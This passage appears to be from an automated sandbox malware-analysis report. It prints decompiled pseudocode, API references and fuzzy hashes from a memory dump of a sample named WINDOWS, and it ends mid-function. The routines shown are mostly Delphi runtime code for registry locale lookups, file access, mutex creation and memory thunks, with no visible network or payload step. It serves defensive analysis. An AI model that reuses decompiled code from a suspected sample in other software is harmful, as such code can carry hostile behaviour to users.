                                                    Function 00405F94 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405F94(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E004061D0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








                                                    0x00405f9c
                                                    0x00405fa2
                                                    0x00405fb2
                                                    0x00405fbb
                                                    0x00405fc0
                                                    0x00405fc2
                                                    0x00405fc7
                                                    0x00405fcc
                                                    0x00405fcc
                                                    0x00405fc7
                                                    0x00405fda

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                      • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                      • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                    • String ID:
                                                    • API String ID: 2796650324-0
                                                    • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                    • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409974 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00409974(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                    0x00409977
                                                    0x00409988
                                                    0x0040998f
                                                    0x00409991
                                                    0x00409991
                                                    0x0040999f

                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                    • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
                                                    • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                    • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409A58 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409A58(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                    0x00409a63
                                                    0x00409a6b
                                                    0x00409a74
                                                    0x00409a75
                                                    0x00409a78
                                                    0x00409a78

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                    • Instruction ID: b45727f5bee9a1b88d075e34cfdcfeb0f7af153fe39d01b3b8471be6c8c36cfb
                                                    • Opcode Fuzzy Hash: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                    • Instruction Fuzzy Hash: 7AC08CB1B092002ADE5061FD1CC2A0B42C80A442387602B3BF47EF23D3E23DAC162418
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406F8E Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00406F8E(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                    0x00406f93
                                                    0x00406f9b
                                                    0x00406fa6
                                                    0x00406fac

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID:
                                                    • API String ID: 1964310414-0
                                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                    • Instruction ID: 98e81aead139b17a815cef7455711068e9fc67f306ce3b3ca14eba37014c667d
                                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                    • Instruction Fuzzy Hash: 76D0127325024DAFCB00EEBDDC05DAB33DC9728609B408425B929C7100D139E9508B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406F90 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                    0x00406f93
                                                    0x00406f9b
                                                    0x00406fa6
                                                    0x00406fac

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID:
                                                    • API String ID: 1964310414-0
                                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                    • Instruction ID: 3e008c22956fc280003415e3679d606a6b79cccc06a071e67c7aa2054a22c523
                                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                    • Instruction Fuzzy Hash: 96C0127315024DAFCB00EEA9DC05D9B33DC5728609B408425B929C7100C139E5508B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040991C Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040991C(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}




                                                    0x00409939
                                                    0x0040993f

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,?,00418E54,00000001), ref: 00409939
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                    • Instruction ID: 060bc272a188b5da0ac96ce548da9ccbd18b50796637518aaa4824f3fdc661df
                                                    • Opcode Fuzzy Hash: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                    • Instruction Fuzzy Hash: 5DC092B03C030032F93021B62C8BF26004C2744F18FA2853AB785FE1C3C8E9B818015C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045D2F8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0045D2F8(signed int __eax, void* __ecx) {
				struct _ITEMIDLIST** _t10;

				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
				return  *_t10;
			}




                                                    0x0045d307
                                                    0x0045d310

                                                    APIs
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FolderLocationSpecial
                                                    • String ID:
                                                    • API String ID: 3328827890-0
                                                    • Opcode ID: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                    • Instruction ID: ef8edf6798076d0a212359ae3af47a46da83506bc8f37cce848a45b11e0c3a11
                                                    • Opcode Fuzzy Hash: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                    • Instruction Fuzzy Hash: 02C09BB13150045AD204AB49FD47F97335CD754345F500519F4D4CA154D354A9005EA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409A7C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409A7C(void* __eax) {
				long _t4;

				_t4 = GetFileAttributesA(E00404E80(__eax)); // executed
				return _t4;
			}




                                                    0x00409a87
                                                    0x00409a8d

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                    • Instruction ID: 67a43f86abe4dd1ef5a5c4911a27f769ef87cc39f57c29bfc39dbdecf4d4660c
                                                    • Opcode Fuzzy Hash: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                    • Instruction Fuzzy Hash: 58A011C0B0020022CA0032FA2CC2A0A00CC2B882283800A3EB208E2283E83CA808002C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00435634 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00435634(void* __eax) {
				int _t3;

				 *((char*)(__eax + 0x10)) = 3;
				_t3 = WinHelpA(0, 0x43564c, 2, 0); // executed
				return _t3;
			}




                                                    0x00435634
                                                    0x00435643
                                                    0x00435648

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Help
                                                    • String ID:
                                                    • API String ID: 2830496658-0
                                                    • Opcode ID: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                    • Instruction ID: 79a91a3f31a143df2f0efbcac983927cafc7536058e87a69d5408432099ce831
                                                    • Opcode Fuzzy Hash: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                    • Instruction Fuzzy Hash: F8B011C0BC8380BAFA2222288C0BF080C002B00F08FE000CAB2083C0C302ECA200002E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422BCC Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00422BCC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x49e88c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x49e888; // 0x2220000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004029DC(0x49b5c8, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00422BC4(_t2, E00422BA4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E00422BC4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x49e88c;
						 *0x49e88c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x49e888 = _t35;
				}
				_t25 =  *0x49e88c;
				 *0x49e88c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x49e88c;
			}








                                                    0x00422bda
                                                    0x00422bea
                                                    0x00422bef
                                                    0x00422bf1
                                                    0x00422bf6
                                                    0x00422bf8
                                                    0x00422c05
                                                    0x00422c0f
                                                    0x00422c17
                                                    0x00422c1a
                                                    0x00422c1a
                                                    0x00422c1d
                                                    0x00422c1d
                                                    0x00422c20
                                                    0x00422c2a
                                                    0x00422c2f
                                                    0x00422c32
                                                    0x00422c34
                                                    0x00422c3b
                                                    0x00422c42
                                                    0x00422c42
                                                    0x00422c4a
                                                    0x00422c4f
                                                    0x00422c54
                                                    0x00422c5a
                                                    0x00422c61

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                    • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                    • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                    • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00406018 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E00406018(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00406004(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00406004(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L0040131C();
									while( *_t93 != 0) {
										_t90 = E00406004(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L0040131C();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401324();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L0040131C();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401324();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L0040131C();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L0040131C();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                    0x00406024
                                                    0x00406027
                                                    0x0040602d
                                                    0x0040603a
                                                    0x0040603e
                                                    0x00406080
                                                    0x00406086
                                                    0x004060c3
                                                    0x00000000
                                                    0x00406088
                                                    0x0040608f
                                                    0x004060a0
                                                    0x004060a5
                                                    0x004060ab
                                                    0x004060b3
                                                    0x004060b8
                                                    0x004060c6
                                                    0x004060c8
                                                    0x004060ce
                                                    0x004060d2
                                                    0x004060d9
                                                    0x004060da
                                                    0x00406185
                                                    0x004060ec
                                                    0x004060f0
                                                    0x004060fd
                                                    0x00406104
                                                    0x00406105
                                                    0x0040610e
                                                    0x0040610f
                                                    0x00406127
                                                    0x0040612c
                                                    0x0040612f
                                                    0x00406134
                                                    0x0040613a
                                                    0x0040613b
                                                    0x0040614b
                                                    0x0040614d
                                                    0x0040615d
                                                    0x00406164
                                                    0x0040616e
                                                    0x0040616f
                                                    0x00406174
                                                    0x0040617a
                                                    0x0040617b
                                                    0x00406181
                                                    0x00406183
                                                    0x00000000
                                                    0x00406183
                                                    0x0040614b
                                                    0x0040612c
                                                    0x00000000
                                                    0x004060fd
                                                    0x00406191
                                                    0x00406198
                                                    0x0040619c
                                                    0x0040619d
                                                    0x0040619d
                                                    0x004060b8
                                                    0x004060a5
                                                    0x0040608f
                                                    0x00406040
                                                    0x0040604b
                                                    0x0040604f
                                                    0x00000000
                                                    0x00406051
                                                    0x00406051
                                                    0x0040605c
                                                    0x00406060
                                                    0x00406065
                                                    0x00000000
                                                    0x00406067
                                                    0x0040606a
                                                    0x00406071
                                                    0x00406075
                                                    0x00406076
                                                    0x00406076
                                                    0x00406065
                                                    0x0040604f
                                                    0x004061a2
                                                    0x004061ab

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                    • lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                    • API String ID: 3245196872-1565342463
                                                    • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                    • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045695C Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
